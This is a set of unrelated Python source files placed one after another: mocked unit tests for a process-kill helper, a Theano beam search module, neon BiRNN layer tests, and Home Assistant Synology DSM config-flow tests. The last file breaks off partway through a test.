# use the default kill level
self.kill.level = None
expected = [call(" {0}".format(pid)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill(name='emacs',
time_to_sleep=0)
self.assertEqual(self.connection.kill.call_args_list, expected)
return
def test_set_level(self):
"""
If you set the level, will the command change?
"""
pgrep = MagicMock()
self.connection.kill.return_value = [""], [""]
level = randrange(100)
self.kill.level = level
self.assertEqual(self.kill.level, "-{0}".format(level))
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
expected = [call(" -{1} {0}".format(pid, level)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill.kill(name='emacs')
self.assertEqual(self.connection.kill.call_args_list, expected)
return
def test_reset_level(self):
"""
Can you go back to the default level?
"""
pgrep = MagicMock()
self.connection.kill.return_value = [""], [""]
level = randrange(100)
self.kill.level = level
# reset here
self.kill.level = None
self.assertEqual(self.kill.level, "")
# pids[0] is the first traversal over pids , pids[1] is the check for unkilled pids
pids = [['{0}'.format(randrange(1000)) for i in range(randrange(100))]] + [[]]
def side_effects(*args, **kwargs):
return pids.pop(0)
pgrep.side_effect = side_effects
expected = [call(" {0}".format(pid)) for pid in pids[0]]
self.kill._grep = pgrep
self.kill.kill(name='emacs')
self.assertEqual(self.connection.kill.call_args_list, expected)
return
|
|
"""The beam search module."""
from collections import OrderedDict
from six.moves import range
import logging
import numpy
from picklable_itertools.extras import equizip
import theano
from theano import function
from blocks_extras.bricks.sequence_generator2 import SequenceGenerator
from blocks.filter import VariableFilter, get_application_call, get_brick
from blocks.graph import ComputationGraph
from blocks.roles import INPUT, OUTPUT
logger = logging.getLogger(__name__)
class CandidateNotFoundError(Exception):
pass
class BeamSearch(object):
"""Approximate search for the most likely sequence.
Beam search is an approximate algorithm for finding :math:`y^* =
argmax_y P(y|c)`, where :math:`y` is an output sequence, :math:`c` are
the contexts, :math:`P` is the output distribution of a
:class:`.SequenceGenerator`. At each step it considers :math:`k`
candidate sequence prefixes. :math:`k` is called the beam size, and the
    sequences are called the beam. The sequences are replaced with their
    :math:`k` most probable continuations, and this is repeated until an
    end-of-line symbol is met.
The beam search compiles quite a few Theano functions under the hood.
Normally those are compiled at the first :meth:`search` call, but
you can also explicitly call :meth:`compile`.
Parameters
----------
beam_size : int
The beam size.
samples : :class:`~theano.Variable`
An output of a sampling computation graph built by
:meth:`~blocks.brick.SequenceGenerator.generate`, the one
corresponding to sampled sequences.
See Also
--------
:class:`.SequenceGenerator`
Notes
-----
Sequence generator should use an emitter which has `probs` method
e.g. :class:`SoftmaxEmitter`.
Does not support dummy contexts so far (all the contexts must be used
in the `generate` method of the sequence generator for the current code
to work).
"""
def __init__(self, beam_size, samples):
self.beam_size = beam_size
# Extracting information from the sampling computation graph
cg = ComputationGraph(samples)
self.inputs = cg.inputs
self.generator = get_brick(samples)
if not isinstance(self.generator, SequenceGenerator):
raise ValueError
self.generate_call = get_application_call(samples)
if (not self.generate_call.application ==
self.generator.generate):
raise ValueError
self.inner_cg = ComputationGraph(self.generate_call.inner_outputs)
# Fetching names from the sequence generator
self.context_names = self.generator.generate.contexts
self.state_names = self.generator.generate.states
# Parsing the inner computation graph of sampling scan
self.contexts = [
VariableFilter(bricks=[self.generator],
name=name,
roles=[INPUT])(self.inner_cg)[0]
for name in self.context_names]
self.input_states = []
# Includes only those state names that were actually used
# in 'generate'
self.input_state_names = []
for name in self.generator.generate.states:
var = VariableFilter(
bricks=[self.generator], name=name,
roles=[INPUT])(self.inner_cg)
if var:
self.input_state_names.append(name)
self.input_states.append(var[0])
self.compiled = False
def _compile_context_computer(self):
self.context_computer = function(
self.inputs, self.contexts, on_unused_input='ignore')
def _compile_initial_state_computer(self):
# TODO: should be now extractable from the computation graph
initial_states = self.generator.initial_states(
1, as_dict=True,
**dict(equizip(self.context_names, self.contexts)))
self.initial_state_computer = function(
self.contexts, initial_states, on_unused_input='ignore')
def _compile_next_state_computer(self):
next_states = [VariableFilter(bricks=[self.generator],
name=name,
roles=[OUTPUT])(self.inner_cg)[-1]
for name in self.state_names]
next_outputs = VariableFilter(
applications=[self.generator.readout.sample],
name='samples')(self.inner_cg.variables)
self.next_state_computer = function(
self.contexts + self.input_states + next_outputs, next_states,
# This is temporarily required because `lm_logprobs` is a weird
# state which is not used to compute next state, but used to
# compute the next output.
on_unused_input='ignore')
def _compile_logprobs_computer(self):
        # This filtering should return variables that are identical in
        # terms of the computation they perform, so we do not care
        # which one to use.
scores = self.generator.readout.scores(
**dict(zip(self.context_names, self.contexts) +
zip(self.input_state_names, self.input_states)))
self.logprobs_computer = function(
self.contexts + self.input_states, -scores,
on_unused_input='ignore')
def compile(self):
"""Compile all Theano functions used."""
self._compile_context_computer()
self._compile_initial_state_computer()
self._compile_next_state_computer()
self._compile_logprobs_computer()
self.compiled = True
def compute_contexts(self, inputs):
"""Computes contexts from inputs.
Parameters
----------
inputs : dict
Dictionary of input arrays.
Returns
-------
A {name: :class:`numpy.ndarray`} dictionary of contexts ordered
like `self.context_names`.
"""
contexts = self.context_computer(*[inputs[var]
for var in self.inputs])
return OrderedDict(equizip(self.context_names, contexts))
def compute_initial_states(self, contexts):
"""Computes initial states.
Parameters
----------
contexts : dict
A {name: :class:`numpy.ndarray`} dictionary of contexts.
Returns
-------
A {name: :class:`numpy.ndarray`} dictionary of states ordered like
`self.state_names`.
"""
return self.initial_state_computer(*list(contexts.values()))
def compute_logprobs(self, contexts, states):
"""Compute log probabilities of all possible outputs.
Parameters
----------
contexts : dict
A {name: :class:`numpy.ndarray`} dictionary of contexts.
states : dict
A {name: :class:`numpy.ndarray`} dictionary of states.
Returns
-------
A :class:`numpy.ndarray` of the (beam size, number of possible
outputs) shape.
"""
input_states = [states[name] for name in self.input_state_names]
return self.logprobs_computer(*(list(contexts.values()) +
input_states))
def compute_next_states(self, contexts, states, outputs):
"""Computes next states.
Parameters
----------
contexts : dict
A {name: :class:`numpy.ndarray`} dictionary of contexts.
states : dict
A {name: :class:`numpy.ndarray`} dictionary of states.
outputs : :class:`numpy.ndarray`
A :class:`numpy.ndarray` of this step outputs.
Returns
-------
A {name: numpy.array} dictionary of next states.
"""
input_states = [states[name] for name in self.input_state_names]
next_values = self.next_state_computer(*(list(contexts.values()) +
input_states + [outputs]))
return OrderedDict(equizip(self.state_names, next_values))
@staticmethod
def _smallest(matrix, k):
"""Find k smallest elements of a matrix.
Parameters
----------
matrix : :class:`numpy.ndarray`
The matrix.
k : int
The number of smallest elements required.
Returns
-------
Tuple of ((row numbers, column numbers), values).
"""
flatten = matrix.flatten()
if flatten.shape[0] > k:
args = numpy.argpartition(flatten, k)[:k]
else:
args = numpy.arange(flatten.shape[0])
args = args[numpy.argsort(flatten[args])]
return numpy.unravel_index(args, matrix.shape), flatten[args]
def search(self, input_values, eol_symbol, max_length,
ignore_first_eol=False, as_arrays=False,
char_discount=0, round_to_inf=1e9,
stop_on='patience', consider_all_eos=False,
validate_solution_function=None):
"""Performs beam search.
If the beam search was not compiled, it also compiles it.
Parameters
----------
input_values : dict
A {:class:`~theano.Variable`: :class:`~numpy.ndarray`}
dictionary of input values. The shapes should be
the same as if you ran sampling with batch size equal to
`beam_size`. Put it differently, the user is responsible
for duplicaling inputs necessary number of times, because
this class has insufficient information to do it properly.
eol_symbol : int
End of sequence symbol, the search stops when the symbol is
generated.
max_length : int
Maximum sequence length, the search stops when it is reached.
ignore_first_eol : bool, optional
            When ``True``, an end-of-sequence symbol generated at the
            first iteration is ignored. This is useful when the sequence
generator was trained on data with identical symbols for
sequence start and sequence end.
as_arrays : bool, optional
If ``True``, the internal representation of search results
is returned, that is a (matrix of outputs, mask,
costs of all generated outputs) tuple.
Returns
-------
outputs : list of lists of ints
A list of the `beam_size` best sequences found in the order
of decreasing likelihood.
costs : list of floats
A list of the costs for the `outputs`, where cost is the
negative log-likelihood.
"""
if validate_solution_function:
raise ValueError
if not self.compiled:
self.compile()
contexts = self.compute_contexts(input_values)
large_contexts = OrderedDict(contexts)
states = self.compute_initial_states(contexts)
# This array will store all generated outputs, including those from
# previous step and those from already finished sequences.
all_outputs = -1 * numpy.ones((1, 1), dtype='int64')
all_costs = numpy.zeros_like(all_outputs, dtype=theano.config.floatX)
done = []
min_cost = 1000
for i in range(max_length):
if len(states.values()[0].flatten()) == 0:
break
if stop_on == 'patience':
done = sorted(done, key=lambda x: x[1][-1] - char_discount * len(x[1]))
done = done[:self.beam_size]
if done:
current_best_cost = done[0][1][-1] - char_discount * len(done[0][1])
if current_best_cost < min_cost:
min_cost = current_best_cost
patience = 30
else:
patience -= 1
if patience == 0:
break
elif stop_on == 'optimistic_future_cost':
# stop only when we have at least self.beam_size sequences,
# that are all cheaper than we can possibly obtain by extending
# other ones
if (len(done) >= self.beam_size):
optimistic_future_cost = (all_costs[-1, :].min() -
char_discount * max_length)
last_in_done = done[self.beam_size - 1][1]
# note: done is sorted by the cost with char discount subtracted
last_in_done_cost = (last_in_done[-1] -
char_discount * len(last_in_done))
if last_in_done_cost < optimistic_future_cost:
break
else:
raise ValueError('Unknown stopping criterion {}'.format(stop_on))
# Broadcasting of contexts, should happen only once
if large_contexts.values()[0].shape[1] != states.values()[0].shape[0]:
# logger.debug("Reshape contexts 1")
for name, ctx in contexts.items():
large_contexts[name] = numpy.take(ctx, [0]*states.values()[0].shape[0], axis=1)
logprobs = self.compute_logprobs(large_contexts, states)
assert numpy.isfinite(logprobs).all()
next_costs = (all_costs[-1, :, None] + logprobs)
if consider_all_eos:
for idx in range(self.beam_size):
candidate = numpy.concatenate(
[all_outputs[:, idx], [eol_symbol]])
costs = numpy.concatenate([all_costs[:, idx],
[next_costs[idx, eol_symbol]]])
done.append((candidate, costs))
(indices, outputs), chosen_costs = self._smallest(
next_costs, self.beam_size)
# Rearrange everything
for name in states:
states[name] = numpy.take(states[name], indices, axis=0)
all_outputs = numpy.take(all_outputs, indices, axis=1)
all_costs = numpy.take(all_costs, indices, axis=1)
if large_contexts.values()[0].shape[1] != states.values()[0].shape[0]:
# logger.debug('Reshape contexts 2')
for name, ctx in contexts.items():
large_contexts[name] = numpy.take(ctx, [0]*states.values()[0].shape[0], axis=1)
states = self.compute_next_states(large_contexts, states, outputs)
all_outputs = numpy.vstack([all_outputs, outputs[None, :]])
all_costs = numpy.vstack([all_costs, chosen_costs[None, :]])
mask = outputs != eol_symbol
if ignore_first_eol and i == 0:
mask[:] = 1
for idx in numpy.where(
(all_outputs[-1] == eol_symbol) &
(all_costs[-1] - all_costs[-2] < round_to_inf))[0]:
if (validate_solution_function is None or
validate_solution_function(input_values,
all_outputs[:, idx])):
done.append((all_outputs[:, idx], all_costs[:, idx]))
unfinished = numpy.where(mask == 1)[0]
for name in states:
states[name] = numpy.take(states[name], unfinished, axis=0)
all_outputs = numpy.take(all_outputs, unfinished, axis=1)
all_costs = numpy.take(all_costs, unfinished, axis=1)
if not done:
done = [(all_outputs[:, i], all_costs[:, i])
for i in range(all_outputs.shape[1])]
done = sorted(done, key=lambda x: x[1][-1] - char_discount * len(x[1]))
max_len = max((seq[0].shape[0] for seq in done))
all_outputs = numpy.zeros((max_len, len(done)))
all_masks = numpy.zeros((max_len, len(done)))
all_costs = numpy.zeros((max_len, len(done)))
for i, (seq, cost) in enumerate(done):
all_outputs[:len(seq), i] = seq
all_masks[:len(seq), i] = 1
all_costs[:len(cost), i] = cost
all_costs[len(cost):, i] = cost[-1]
all_outputs = all_outputs[1:]
all_masks = all_masks[1:]
all_costs = all_costs[1:] - all_costs[:-1]
result = all_outputs, all_masks, all_costs
if as_arrays:
return result
return self.result_to_lists(result)
@staticmethod
def result_to_lists(result):
outputs, masks, costs = [array.T for array in result]
outputs = [list(output[:int(mask.sum())])
for output, mask in equizip(outputs, masks)]
costs = list(costs.T.sum(axis=0))
return outputs, costs
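# A minimal, illustrative sketch (not part of blocks): the k-best selection
# that BeamSearch._smallest performs, shown on a tiny cost matrix. Row indices
# pick which beam entry to extend, column indices which output symbol.
if __name__ == '__main__':
    costs = numpy.array([[3.0, 0.5, 2.0],
                         [1.0, 4.0, 0.1]])
    (rows, cols), values = BeamSearch._smallest(costs, 2)
    # The two cheapest continuations are (beam 1, symbol 2) and
    # (beam 0, symbol 1), with costs 0.1 and 0.5 respectively.
    assert list(values) == [0.1, 0.5]
    assert list(rows) == [1, 0] and list(cols) == [2, 1]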
|
|
# ----------------------------------------------------------------------------
# Copyright 2015-2016 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
'''
Test of the BiRNN layer
'''
from builtins import zip
import itertools as itt
import numpy as np
from numpy import concatenate as con
from neon import NervanaObject
from neon.initializers.initializer import GlorotUniform
from neon.layers.recurrent import BiRNN, Recurrent, get_steps, BiSum, BiBNRNN
from neon.transforms import Rectlinclip
from utils import allclose_with_out
def pytest_generate_tests(metafunc):
bsz_rng = [1, 4]
if 'fargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
seq_rng = [2, 3, 4]
inp_rng = [3, 5, 10]
out_rng = [3, 5, 10, 1152]
else:
seq_rng = [3]
inp_rng = [5]
out_rng = [10, 1152]
fargs = itt.product(seq_rng, inp_rng, out_rng, bsz_rng)
metafunc.parametrize('fargs', fargs)
def test_biRNN_fprop_rnn(backend_default, fargs, deltas_buffer):
# basic sanity check with 0 weights random inputs
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
out_shape = (hidden_size, seq_len)
NervanaObject.be.bsz = batch_size
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
# setup the bi-directional rnn
init_glorot = GlorotUniform()
rnn = Recurrent(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
rnn.configure(in_shape)
rnn.prev_layer = True
rnn.allocate()
# same weight for bi-rnn backward and rnn weights
nout = hidden_size
birnn.W_input_b[:] = birnn.W_input_f
birnn.W_recur_b[:] = birnn.W_recur_f
birnn.b_b[:] = birnn.b_f
birnn.dW[:] = 0
rnn.W_input[:] = birnn.W_input_f
rnn.W_recur[:] = birnn.W_recur_f
rnn.b[:] = birnn.b_f
rnn.dW[:] = 0
# inputs - random and flipped left-to-right inputs
lr = np.random.random((input_size, seq_len * batch_size))
lr_rev = list(reversed(get_steps(lr.copy(), in_shape)))
rl = con(lr_rev, axis=1)
inp_lr = birnn.be.array(lr)
inp_rl = birnn.be.array(rl)
inp_rnn = rnn.be.array(lr)
# outputs
out_lr = birnn.fprop(inp_lr).get().copy()
birnn.h_buffer[:] = 0
out_rl = birnn.fprop(inp_rl).get()
out_rnn = rnn.fprop(inp_rnn).get().copy()
# views
out_lr_f_s = get_steps(out_lr[:nout], out_shape)
out_lr_b_s = get_steps(out_lr[nout:], out_shape)
out_rl_f_s = get_steps(out_rl[:nout], out_shape)
out_rl_b_s = get_steps(out_rl[nout:], out_shape)
out_rnn_s = get_steps(out_rnn, out_shape)
# asserts for fprop
for x_rnn, x_f, x_b, y_f, y_b in zip(out_rnn_s, out_lr_f_s, out_lr_b_s,
reversed(out_rl_f_s), reversed(out_rl_b_s)):
assert np.allclose(x_f, y_b, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_b, y_f, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_rnn, x_f, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_rnn, y_b, rtol=0.0, atol=1.0e-5)
def test_biRNN_fprop(backend_default, fargs):
# basic sanity check with 0 weights random inputs
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
out_shape = (hidden_size, seq_len)
NervanaObject.be.bsz = batch_size
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
# same weight
nout = hidden_size
birnn.W_input_b[:] = birnn.W_input_f
birnn.W_recur_b[:] = birnn.W_recur_f
birnn.b_b[:] = birnn.b_f
birnn.dW[:] = 0
# inputs - random and flipped left-to-right inputs
lr = np.random.random((input_size, seq_len * batch_size))
lr_rev = list(reversed(get_steps(lr.copy(), in_shape)))
rl = con(lr_rev, axis=1)
inp_lr = birnn.be.array(lr)
inp_rl = birnn.be.array(rl)
# outputs
out_lr = birnn.fprop(inp_lr).get().copy()
birnn.h_buffer[:] = 0
out_rl = birnn.fprop(inp_rl).get().copy()
# views
out_lr_f_s = get_steps(out_lr[:nout], out_shape)
out_lr_b_s = get_steps(out_lr[nout:], out_shape)
out_rl_f_s = get_steps(out_rl[:nout], out_shape)
out_rl_b_s = get_steps(out_rl[nout:], out_shape)
# asserts
for x_f, x_b, y_f, y_b in zip(out_lr_f_s, out_lr_b_s,
reversed(out_rl_f_s), reversed(out_rl_b_s)):
assert np.allclose(x_f, y_b, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_b, y_f, rtol=0.0, atol=1.0e-5)
def test_biRNN_bprop(backend_default, fargs, deltas_buffer):
# basic sanity check with 0 weights random inputs
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
NervanaObject.be.bsz = batch_size
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
birnn.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
birnn.set_deltas(deltas_buffer)
# same weight for bi-rnn backward and rnn weights
birnn.W_input_b[:] = birnn.W_input_f
birnn.W_recur_b[:] = birnn.W_recur_f
birnn.b_b[:] = birnn.b_f
birnn.dW[:] = 0
# same weight for bi-directional rnn
init_glorot = GlorotUniform()
rnn = Recurrent(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
rnn.configure(in_shape)
rnn.prev_layer = True
rnn.allocate()
rnn.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
rnn.set_deltas(deltas_buffer)
# inputs and views
lr = np.random.random((input_size, seq_len * batch_size))
lr_rev = list(reversed(get_steps(lr.copy(), in_shape)))
rl = con(lr_rev, axis=1)
# allocate gpu buffers
inp_lr = birnn.be.array(lr)
inp_rl = birnn.be.array(rl)
# outputs
out_lr_g = birnn.fprop(inp_lr)
del_lr = birnn.bprop(out_lr_g).get().copy()
birnn.h_buffer[:] = 0
out_rl_g = birnn.fprop(inp_rl)
del_rl = birnn.bprop(out_rl_g).get().copy()
del_lr_s = get_steps(del_lr, in_shape)
del_rl_s = get_steps(del_rl, in_shape)
for (x, y) in zip(del_lr_s, reversed(del_rl_s)):
assert np.allclose(x, y, rtol=0.0, atol=1.0e-5)
def test_biSum(backend_default, fargs, deltas_buffer):
seq_len, input_size, hidden_size, batch_size = fargs
input_size *= 2
in_shape = (input_size, seq_len)
NervanaObject.be.bsz = batch_size
bisum = BiSum()
bisum.configure(in_shape)
bisum.prev_layer = True
bisum.allocate()
bisum.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
bisum.set_deltas(deltas_buffer)
# inputs
inp_np = np.random.random((input_size, seq_len * batch_size))
inp_be = bisum.be.array(inp_np)
# outputs
out_be = bisum.fprop(inp_be)
del_be = bisum.bprop(out_be)
out_ref = bisum.be.empty_like(out_be)
out_ref[:] = inp_be[:input_size // 2] + inp_be[input_size // 2:]
assert out_be.shape[0] * 2 == inp_be.shape[0]
assert allclose_with_out(out_be.get(), out_ref.get(), rtol=0.0, atol=1.0e-5)
assert allclose_with_out(del_be[:input_size // 2].get(), out_be.get(), rtol=0.0, atol=1.0e-5)
assert allclose_with_out(del_be[input_size // 2:].get(), out_be.get(), rtol=0.0, atol=1.0e-5)
def test_bibn(backend_default, fargs, deltas_buffer):
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
NervanaObject.be.bsz = batch_size
hidden_size = min(10, hidden_size)
# set up the bi-directional RNN
init_glorot = GlorotUniform()
birnn = BiBNRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
birnn.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
birnn.set_deltas(deltas_buffer)
# test fprop
# set the ff buffer
inp_np = np.random.random(birnn.h_ff_buffer.shape)
inp_be = birnn.be.array(inp_np)
birnn.h_ff_buffer[:] = inp_np
# compare the bn output with calling the backend bn
xsum = birnn.be.zeros_like(birnn.xmean)
xvar = birnn.be.zeros_like(birnn.xvar)
gmean = birnn.be.zeros_like(birnn.gmean)
gvar = birnn.be.zeros_like(birnn.gvar)
gamma = birnn.be.ones(birnn.gamma.shape)
beta = birnn.be.zeros_like(birnn.beta)
grad_gamma = birnn.be.zeros_like(gamma)
grad_beta = birnn.be.zeros_like(beta)
out_ref = birnn.be.zeros_like(birnn.h_ff_buffer)
xsum[:] = birnn.be.sum(birnn.h_ff_buffer, axis=1)
birnn.be.compound_fprop_bn(
birnn.h_ff_buffer, xsum, xvar, gmean, gvar,
gamma, beta, out_ref, birnn.eps, birnn.rho,
accumbeta=0, relu=False)
# call the bibnrnn layer fprop_bn
out_bn = birnn._fprop_bn(birnn.h_ff_buffer, inference=False)
assert allclose_with_out(out_bn.get(), out_ref.get(), rtol=0.0, atol=1.0e-5)
# test bprop
err_np = np.random.random(birnn.h_ff_buffer.shape)
err_be = birnn.be.array(err_np)
err_out_ref = birnn.be.empty_like(err_be)
birnn.be.compound_bprop_bn(err_out_ref, grad_gamma, grad_beta,
err_be,
inp_be, xsum, xvar, gamma,
birnn.eps)
err_out_bn = birnn._bprop_bn(err_be, out_bn)
assert allclose_with_out(err_out_bn.get(), err_out_ref.get(), rtol=0.0, atol=2.5e-5)
|
|
"""Tests for the Synology DSM config flow."""
from unittest.mock import MagicMock, Mock, patch
import pytest
from synology_dsm.exceptions import (
SynologyDSMException,
SynologyDSMLogin2SAFailedException,
SynologyDSMLogin2SARequiredException,
SynologyDSMLoginInvalidException,
SynologyDSMRequestException,
)
from homeassistant import data_entry_flow
from homeassistant.components import ssdp
from homeassistant.components.synology_dsm.config_flow import CONF_OTP_CODE
from homeassistant.components.synology_dsm.const import (
CONF_VOLUMES,
DEFAULT_PORT,
DEFAULT_PORT_SSL,
DEFAULT_SCAN_INTERVAL,
DEFAULT_TIMEOUT,
DEFAULT_USE_SSL,
DEFAULT_VERIFY_SSL,
DOMAIN,
)
from homeassistant.config_entries import SOURCE_REAUTH, SOURCE_SSDP, SOURCE_USER
from homeassistant.const import (
CONF_DISKS,
CONF_HOST,
CONF_MAC,
CONF_PASSWORD,
CONF_PORT,
CONF_SCAN_INTERVAL,
CONF_SSL,
CONF_TIMEOUT,
CONF_USERNAME,
CONF_VERIFY_SSL,
)
from homeassistant.core import HomeAssistant
from .consts import (
DEVICE_TOKEN,
HOST,
MACS,
PASSWORD,
PORT,
SERIAL,
SERIAL_2,
USE_SSL,
USERNAME,
VERIFY_SSL,
)
from tests.common import MockConfigEntry
@pytest.fixture(name="service")
def mock_controller_service():
"""Mock a successful service."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.information.serial = SERIAL
service_mock.return_value.utilisation.cpu_user_load = 1
service_mock.return_value.storage.disks_ids = ["sda", "sdb", "sdc"]
service_mock.return_value.storage.volumes_ids = ["volume_1"]
service_mock.return_value.network.macs = MACS
yield service_mock
@pytest.fixture(name="service_2sa")
def mock_controller_service_2sa():
"""Mock a successful service with 2SA login."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.login = Mock(
side_effect=SynologyDSMLogin2SARequiredException(USERNAME)
)
service_mock.return_value.information.serial = SERIAL
service_mock.return_value.utilisation.cpu_user_load = 1
service_mock.return_value.storage.disks_ids = ["sda", "sdb", "sdc"]
service_mock.return_value.storage.volumes_ids = ["volume_1"]
service_mock.return_value.network.macs = MACS
yield service_mock
@pytest.fixture(name="service_vdsm")
def mock_controller_service_vdsm():
"""Mock a successful service."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.information.serial = SERIAL
service_mock.return_value.utilisation.cpu_user_load = 1
service_mock.return_value.storage.disks_ids = []
service_mock.return_value.storage.volumes_ids = ["volume_1"]
service_mock.return_value.network.macs = MACS
yield service_mock
@pytest.fixture(name="service_failed")
def mock_controller_service_failed():
"""Mock a failed service."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.information.serial = None
service_mock.return_value.utilisation.cpu_user_load = None
service_mock.return_value.storage.disks_ids = []
service_mock.return_value.storage.volumes_ids = []
service_mock.return_value.network.macs = []
yield service_mock
async def test_user(hass: HomeAssistant, service: MagicMock):
"""Test user config."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=None
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
# test with all provided
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: HOST,
CONF_PORT: PORT,
CONF_SSL: USE_SSL,
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == PORT
assert result["data"][CONF_SSL] == USE_SSL
assert result["data"][CONF_VERIFY_SSL] == VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
service.return_value.information.serial = SERIAL_2
# test without port + False SSL
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: HOST,
CONF_SSL: False,
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL_2
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == DEFAULT_PORT
assert not result["data"][CONF_SSL]
assert result["data"][CONF_VERIFY_SSL] == VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_user_2sa(hass: HomeAssistant, service_2sa: MagicMock):
"""Test user with 2sa authentication config."""
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "2sa"
# First attempt fails because the user was too slow to enter the code
service_2sa.return_value.login = Mock(
side_effect=SynologyDSMLogin2SAFailedException
)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {CONF_OTP_CODE: "000000"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "2sa"
assert result["errors"] == {CONF_OTP_CODE: "otp_failed"}
# Successful login with 2SA code
service_2sa.return_value.login = Mock(return_value=True)
service_2sa.return_value.device_token = DEVICE_TOKEN
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {CONF_OTP_CODE: "123456"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == DEFAULT_PORT_SSL
assert result["data"][CONF_SSL] == DEFAULT_USE_SSL
assert result["data"][CONF_VERIFY_SSL] == DEFAULT_VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") == DEVICE_TOKEN
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_user_vdsm(hass: HomeAssistant, service_vdsm: MagicMock):
"""Test user config."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=None
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
# test with all provided
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: HOST,
CONF_PORT: PORT,
CONF_SSL: USE_SSL,
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == PORT
